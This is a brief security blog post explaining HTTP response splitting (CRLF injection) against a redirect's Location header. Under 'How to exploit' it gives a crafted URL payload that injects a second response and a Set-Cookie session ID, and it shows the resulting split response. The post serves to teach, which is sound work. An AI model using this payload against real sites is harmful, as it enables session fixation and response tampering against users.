An Intoduction to HTTP Response splitting

Here I am going to introduce you with HTTP Response splitting which I had written in reply to an Owasp Delhi member's question. Although it's not a comprehensive write up but can give you an insight to the matter.
An application is vulnerable to HTTP Response splitting a.k.a. CRLFinjection when it doesn't validate the user input properly.
For example, if requesting something like GET /myPage.asp?value=anyValueHTTP/1.1 returns response that includes a location header and 302response code:
HTTP/1.1 302 Found
........
........
Location: http://www.myApplication.com/myPage.asp?value=anyValue

Then it might be vulnerable. It means the application is returning the same URL which is requested by the user in Location header.

How to exploit:
Suppose a link crafted by an attacker is clicked by a valid user. I am crafting the script into it: http://www.myapplication.com/myPage.asp?value=12345foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2046%0d%0a%0d%0aSet-Cookie:%20JSESSIONID=9B10905435F29B9CB5B0293FAD933B06%0d%0a%0d%0a

It will give you response like:
HTTP/1.1 302 Found
….....
…....
Location: http://www.myApplication.com/myPage.asp?value=12345
foobar //second response ; %0d is equivalent to Carriage return; %0a is equivalent to Line feed
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 46
Set-Cookie: JSESSIONID=9B10905435F29B9CB5B0293FAD933B06

You get two responses one by server and another by attacker.
This is the basic idea behind the HTTP Response Splitting
For more comprehensive reading refer to:
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

Comments

Popular posts from this blog

SQL Injection in search field

File Upload through Null Byte Injection